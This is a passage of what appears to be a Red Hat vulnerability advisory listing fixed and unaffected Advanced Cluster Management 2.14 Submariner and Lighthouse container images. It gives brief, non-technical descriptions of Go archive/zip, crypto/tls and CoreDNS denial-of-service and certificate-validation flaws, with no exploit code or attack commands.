| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le | — |
Vendor Fix
fix
Workaround
|
Known not affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64 | — |
Workaround
|
Threats
Impact
Important
A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.
7.5 (High)
Affected products
Fixed
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64 | — |
Vendor Fix
fix
Workaround
|
Known not affected
29 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le | — |
Workaround
|
Threats
Impact
Moderate
A flaw was found in golang. A remote attacker could exploit this vulnerability by providing a specially crafted certificate during the error string construction process within the `HostnameError.Error()` function. This flaw, caused by unbounded string concatenation, leads to excessive resource consumption. Successful exploitation can result in a denial of service (DoS) for the affected system.
7.5 (High)
Affected products
Fixed
28 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le | — |
Vendor Fix
fix
|
Known not affected
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64 | — |
Threats
Impact
Important
A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.
7.4 (High)
Affected products
Fixed
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64 | — |
Vendor Fix
fix
|
Known not affected
29 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64 | — | ||
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le | — |
Threats
Impact
Moderate
Multiple CoreDNS server implementations (gRPC, HTTPS, and HTTP/3) lack critical resource-limiting controls. An unauthenticated remote attacker can exhaust memory and degrade or crash the server by opening many concurrent connections, streams, or sending oversized request bodies. The issue is similar in nature to CVE-2025-47950 (QUIC DoS) but affects additional server types that do not enforce connection limits, stream limits, or message size constraints.
5.3 (Medium)
